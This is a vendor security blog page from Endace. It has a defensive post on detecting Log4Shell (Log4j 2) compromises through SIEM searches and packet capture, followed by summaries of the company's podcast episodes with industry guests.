Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Log4J 2 - how can you see if you've been attacked?Many organizations have been scrambling this week to search their networks for instances of any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors trying to determine if their systems or applications are potentially impacted and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat?  Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. This gives remote unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the Log4j 2 process.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

 

Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams such as Palo Alto Network Unit 42, that discuss the risk, scale, and severity of the potential risks to organizations from this zero-day threat. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability there have already been several compromises and ransomware attacks. However, a lot of the current threat actor activity to this point appears to be reconnaissance and planting of additional malware that can be used later after threat actors have obtained initial access to a network and systems on it.

Our technology partner, KeySight Technology, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found you need to isolate and investigate for any potential compromises. It’s essential to put in place policies, rules, and filter protections to monitor outbound egress of traffic to unknown IP addresses. Apply filters and pay extra attention to common traffic protocols like LDAP, LDAPS, RMI, DNS as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.

Of course, you should also ensure your IDS’s or firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata on a SIEM such as Splunk or Elastic, the first place to start looking would be to search all http transactions for strings including JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video of how to use Wireshark to identify and analyze a Log4j2 attack. Well worth watching:

Once you have identified connections that contain the JNDI string you can quickly examine any the subsequent outgoing connections from the affected host to see if successful contact was made with the malicious LDAP server, downloading java malware to infect your server. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have been compromised.

Good luck with the Log4j 2 threat hunting! To learn more about how cost effective and simple it can be to have an always-on network packet capture platform integrated with the rest of your security tools to help you search for Log4J 2 and other zero-day attacks go to www.endace.com.


Endace Packet Forensics Files: Episode #29

Original Entry by : Michael Morris

Michael talks to Tim Dales, VP Labs and Analyst, IT Brand Pulse

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

What is the “Total Cost of Ownership” for security teams to get absolute forensics with full packet capture?

In this episode of the Endace Packet Forensic files, I talk with Tim Dales, VP of Labs and Analyst for IT Brand Pulse. Tim shares the results of an IT Brand Pulse study that examines the cost of in-house developed packet capture solutions versus off-the-shelf, vendor-built solutions.

Tim shares details of the report’s findings including the pros and cons and some of the key things many people don’t consider before trying to build solutions in-house.

Finally, Tim discusses key changes in how organizations are thinking about their security architectures and the gaps they are looking to address. He shares the importance of integrated workflows in helping analysts to accelerate investigation times and confirm or dispense potential indicators of compromise more definitively.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #23

Original Entry by : Michael Morris

Michael talks to Steve Tsirtsonis, Director EMEA Federal Business for Endace

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Nation-state cybersecurity is fast becoming the new battle frontline in international conflict. It is complicated by rogue threat actor groups inserting their cyber weapons into the mix, extorting money for funding, fanning the flames of nation-state disputes, and crippling potential targets.

You won’t want to miss this episode of the Endace Packet Forensic files as I talk with Steve Tsirtsonis, Director EMEA Federal Business for Endace, who shares his view of the threat landscape that government agencies around the world are facing and how it is evolving.

Steve talks about what he sees governments doing to combat escalating cyber threats, what are some of the unique challenges they face and how they are evolving their security using SOAR, AI and NDR tools to be as prepared as possible to defend critical infrastructure.

Finally, Steve gives his thoughts on the key things security teams should look out for in the years ahead and what we can all learn from government security practices.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #18

Original Entry by : Michael Morris

Michael talks to Tim Dudman, Senior Principal Consultant, Riskaware

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Interested in hearing what some of the UK’s leading government cyber defense experts are doing to address their biggest concerns and challenges?

Then don’t miss this insightful episode with Tim Dudman, Senior Principal Consultant for Riskaware, where he shares his experiences in collaborating with academia, industry, and UK Defense funding to generate leading-edge cybersecurity capabilities.

Tim talks about some of the gaps he sees across the industry and how AI and SOAR platforms are fitting in and complementing many security architectures.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #17

Original Entry by : Michael Morris

Michael talks to Jen Miller-Osborn, Deputy Director of Unit 42 at Palo Alto Networks

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Want to hear about the latest attack trends, what to expect in the future and how best to prepare your defenses?

Then don’t miss this episode of our Packet Forensic Files series as Michael catches up with Jen Miller-Osborn from Unit 42 – the threat intelligence group at Palo Alto Networks.

Jen talks about some of the threat trends the team at Unit 42 has been seeing lately – including how ransomware attacks are becoming more sophisticated and targeted, how DDOS attacks are making a comeback, and what the recent Solarwinds “Sunburst” attacks have demonstrated.

She also provides some helpful tips for best practice cyber defense and talks about how the threat landscape might evolve over the next year or two.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #14

Original Entry by : Michael Morris

Michael talks to Brett White, Cybersecurity Architect and Advisor.

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Looking for insights into how to improve your cybersecurity posture? You won’t want to miss our last episode of the Endace Packet Forensic Files for 2020. This episode features special guest Brett White, Cyber Security Advisor and Architect.

Brett has many years of experience at Juniper, Cisco and Palo Alto Networks architecting security solutions and advising clients on how to improve their security stacks and processes. He has also worked as both an in-house CISO and as a “CISO for hire”.

In this episode, Brett shares some recommended best practices for robust cybersecurity including the key foundational components of network-wide visibility and high-quality threat intelligence. He also highlights the importance of stepping back from focusing on technology alone and building a security strategy focused on your organization’s business goals, outcomes, and security imperatives.

Finally, Brett puts his predictions hat and suggests three future areas of cybersecurity to keep an eye on to improve your overall security strategy.

Packet Forensics Files will be back after the Christmas and New Year period with our next installment. In the meantime, we wish you a happy and safe Christmas and New Year. Take care.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #9

Original Entry by : Michael Morris

Michael talks to Shamus McGillicuddy, VP of Research for Enterprise Management Associates

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Want to hear the latest trends and challenges in the network performance management space?

Don’t miss our latest episode of the Endace Packet Forensic Files Vidcast/Podcast series with special guest Shamus McGillicuddy, VP of Research at Enterprise Management Associates (EMA).

Shamus is an industry-leading market research analyst with years of experience in the Network Operations space. He shares his insights on some of the biggest changes going on with NetOps teams and tools including the impact of the pandemic and the massive shift to remote workforces which is driving more complexity and creating performance challenges.

Shamus talks about the importance of both meta-data and full packet data in enabling NetOps teams to be faster and more accurate in solving network issues. Finally, he reveals some differentiators and trends in the monitoring of next-gen, software-defined networks and things to look out for over the next 18 months.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #8

Original Entry by : Michael Morris

Michael talks to Scott Register, VP of Security Solutions for KeySight Technologies

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Catch our latest episode of “Secure Networks – the Packet Forensic Files” vidcast/podcast series with this week’s special guest Scott Register, VP of Security Solutions for KeySight Technologies.

Scott, with his years of experience in building security solutions, shares some of the biggest challenges SecOps teams are facing in today’s environment and what they are doing to solve them.

He talks about the latest trends in the threat landscape and what security teams are doing to test and monitor for these attacks.  Hear how threat simulation can help both validate tool readiness and people processes to elevate your security prevention and response.

Finally, Scott shares his insights into implementing security in 5G and WiFi infrastructures as well as traditional networks and data centers.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #7

Original Entry by : Michael Morris

Michael talks to Travis Rosiek, CTO and Strategy Office at BluVector (a Comcast company)

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

If you haven’t caught up with the insights from our “Secure Networks – the Packet Forensics Files” vidcast/podcast series yet, here is your chance to see what you have been missing out on. This week’s special guest is Travis Rosiek, CTO and Strategy Officer for BluVector (a Comcast company).

Travis, a long-time government cybersecurity specialist, shares his insights into what he sees companies and government agencies are missing from their security strategies.  He talks about how you can begin to move your security activity from being merely reactive to a more proactive approach.

Travis discusses some of the specific challenges and advantages government agencies face compared to enterprises and what both groups can do to elevate their security posture.  He also shares his insights into best practices to protect your IT infrastructure and things to look out for in the ever-changing security landscape.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #6

Original Entry by : Michael Morris

Michael talks to Betty Dubois, Founder and CEO of Packet Detectives

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Don’t miss the latest episode of our Endace Packet Forensic Files Vidcast/Podcast series with this week’s special guest Betty Dubois, CEO /Founder of Packet Detectives and renowned Sharkfest Speaker.

Betty talks about the challenges NetOps and SecOps teams are facing in today’s IT environment. She highlights best practices teams are adopting to adjust to today’s environments and shares her recommendations about how NetOps and SecOps teams can elevate their network investigation skills and processes.

Betty also gives some great tips on how to become a packet capture and Wireshark “power-user” and addresses some of the misconceptions about PCAP data.

Other episodes in the Secure Networks video/audio podcast series are available here.